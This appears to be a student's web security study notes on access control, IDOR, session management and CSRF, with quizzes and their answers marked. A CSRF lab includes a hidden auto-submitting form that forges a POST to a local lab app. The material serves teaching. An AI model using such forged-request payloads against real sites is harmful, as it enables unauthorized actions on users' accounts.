## CIA

### Confidentiality:
Only those authorized can access info.  
#### Vulnerabilities
Unauthorized access to sensitive info (identity theft, financial fraud, or loss of competitive advantage)

---

### Integrity:
Accuracy and completeness of info.  
#### Vulnerabilities
An attacker could cause incorrect info to be displayed/processed, leading to incorrect decision-making, fraude, etc.

---


### Availavility:
Authorized users have timely and reliable access to resources.  
#### Vulnerabilities
Exploits could disrupt services, resulting in loos of prouctivity, revenue, etc.


---
___

## Broken Access Control
Access controls are responsible for determining which users are allowed to access, modify, or delete specific resources within a system. Access control enforces that users cannot act outside of their intended permissions.  

#### Common access control vulnerabilities:

1. Violation of the principle of least privilege or deny by default.
2. Bypassing access control checks by modifying URL params, internal App state, the HTML page or API requests.
3. Insecure direct object references: permitting viewing or editing someone else's account.
4. Accessing API with missing access controls for POST, PUT and DELETE.
5. Elevation of privilege: Acting as a user without being logged, or as an admin without being one.
6. Metadata manipulation: JWTs, cookies, hidden fields.
7. CORS misconfiguration, allowing unauthorized/untrusted origins.
8. Force browsing to authenticated pages as an unauthenticated user or to privileged pages as a standard user.

---
___



## Insecure Direct Object Reference (IDOR)

A common sec vulnerability that happens when an app exposes direct acces con internal objects, such as files, db records, etc, without proper access control.  
Usually, this occurs when devs implement insufficient access controls on resources that are referenced by URL params, form fields or other user-controlled inputs.

---
---

## Insecure Session Management

A session is a temporary interaction between a user and a web application, established to maintain the user’s state and track their activities across multiple requests. These sessions are typically managed through the use of session tokens, which are unique identifiers assigned to each user during their interaction with the application.

Insecure Session Management can lead to unauthorized access, session hijacking, etc, compromising the CIA of user data and the app itself.

Some causes can be:

1. Weak session token generation.
2. Improper storage and transmission of session tokens.
3. Lack of session timeouts.
4. Ineffective session termination.


And some practices and guidelines to prevent ISM:

1. Use secure algorithms to generate session cookies.
2. Ensure the use of HTTPS.
3. Implement secure cookie attributes
4. Regularly expire session tokens.

More info on sessions here: [Session Management Testing](https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/06-Session_Management_Testing/01-Testing_for_Session_Management_Schema)

Quiz:

- What is a session in the context of web application development?
  * A unique identifier used to track user state
- Which of the following is the primary purpose of session tokens?
  * Managing and tracking user activities across multiple requests
- Which security breach can result from Insecure Session Management?
  * Unauthorized access
- What is the main benefit of implementing secure cookie attributes in session management?
  * Protection against session hijacking

---
---


## Cross-Site Request Forgery (CSRF)
Enables an attacker to manipulate and execute unauthorized actions on behalf of an unsuspecting user. The attacker tricks the user into performing actions on a site they are already authenticated on, whithout them knowing/consenting.  

![Attack](https://d36ai2hkxl16us.cloudfront.net/course-uploads/e0df7fbf-a057-42af-8a1f-590912be5460/6fcr2jtrl9za-csrf1.png)

The attack is executed by exploiting the web application’s failure to properly validate the source of incoming requests. It typically involves crafting malicious links, embedding them in seemingly innocuous content such as emails or web pages, and then enticing the user to click on those links. When the user interacts with the malicious content, their browser inadvertently sends a request to the targeted web application, which then executes the unintended action.
The attack inherits the identity and privileges of the victim to perfom the undesired action. For most sites, browser requests automatically include any credentials associated with the site (session cookies, IP address, etc).

CSRF attacks taget functionality taht causes a state change / data mutation, as the attacker doesn't receive the response, the victim does.



## CSRF Lab

Run these commands in your terminal:

```bash
python3 -m venv .venv
source .venv/bin/activate
pip install flask
pip install request
```

In [None]:
# app.py

from flask import Flask, request, url_for, render_template, redirect, make_response
import requests

app = Flask(__name__, static_url_path='/static', static_folder='static')

app.config['DEBUG'] = True

@app.route("/")
def start():
  return render_template("evil.html")

if __name__ == "__main__":
  app.run(host='0.0.0.0', port=1337)

```html
<!-- templates/evil.html -->

<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://0.0.0.0:5000/update' target="csrf-frame" id="csrf-form">
  <input type='hidden' name='color' value='Hackzord!'>
  <input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>
```

```

```html

Run the app with:

```bash
python app.py
```

Open a new browser tab => `http://localhost:1337/`

### CSRF Quiz:

* Which of the following actions could be performed by an attacker in a CSRF attack?
  - [x] Changing the victim’s account settings
  - [ ] Stealing the victim’s session cookie
  - [ ] Directly accessing the victim’s account data
  - [ ] Intercepting the victim’s network traffic
* What is a common method used by attackers to execute a CSRF attack?
  - [ ] Injecting malicious scripts into a web page
  - [ ] Exploiting server-side vulnerabilities
  - [x] Tricking the user into clicking a malicious link
  - [ ] Brute-forcing the user’s credentials
* Which of the following security measures can help prevent CSRF attacks?
  - [ ] Input validation
  - [x] Anti-CSRF tokens
  - [ ] Content Security Policy
  - [ ] Rate limiting
* What purpose does the SameSite attribute serve in relation to CSRF protection?
  - [x] It prevents cookies from being sent in cross-site requests
  - [ ] It encrypts cookies to protect them from theft
  - [ ] It sets a time limit for cookie expiration
  - [ ] It enforces strict transport security on cookies

---
---

## Cryptographic Failures:


